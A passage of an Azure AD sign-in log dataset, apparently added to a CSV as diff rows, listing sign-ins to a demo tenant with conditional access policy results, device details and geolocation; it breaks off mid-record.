'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4130ca1d-0d16-4aad-a433-4063d5830a00,SigninLogs,Sucess,36.6404686,-78.26995087
+868,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:08.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,451012b4-9a00-45d1-8e5f-e78405f776ea,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 04:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c0ce23b7-81fe-4875-94a5-4bf359840b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c0ce23b7-81fe-4875-94a5-4bf359840b00,SigninLogs,Sucess,36.6404686,-78.26995087
+869,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:09.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4c00821d-7bcc-4291-8ba2-3292bfce23e2,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 05:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",23877b62-2023-4ce4-9fb4-bf65090b0a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,23877b62-2023-4ce4-9fb4-bf65090b0a00,SigninLogs,Sucess,36.6404686,-78.26995087
+870,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:04.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a62fe0f8-bb3a-4e36-b73d-1246421ff718,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 05:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",459ca702-517f-41c3-88f0-2f42572e0a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,459ca702-517f-41c3-88f0-2f42572e0a00,SigninLogs,Sucess,36.6404686,-78.26995087
+871,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:05.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ae0a9c9f-44c0-497d-87b2-a656fd8b7972,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 00:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b6b1e129-7976-4148-98ee-f605aefb0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b6b1e129-7976-4148-98ee-f605aefb0600,SigninLogs,Sucess,36.6404686,-78.26995087
+872,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:59.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,372a01ad-c09f-4dac-9aef-15af403bb121,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d09c2317-414d-4072-ab4f-d2f6c7a50e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,low,atRisk,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,d09c2317-414d-4072-ab4f-d2f6c7a50e00,SigninLogs,Sucess,41.90428925,-85.99833679
+873,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:22.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4fe45728-a311-46a8-88e6-15da95570bfe,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 23:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",93d4df14-2ec3-46f2-a774-ff58a44b0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,93d4df14-2ec3-46f2-a774-ff58a44b0600,SigninLogs,Sucess,41.90428925,-85.99833679
+874,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c88d61e-9e87-4216-a0ca-593fd0104f64,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 23:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",724252ea-eeaa-47d5-808a-7afee81d0500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,724252ea-eeaa-47d5-808a-7afee81d0500,SigninLogs,Sucess,36.6404686,-78.26995087
+875,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:34.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:05,"{'operatingSystem': 'Windows 10', 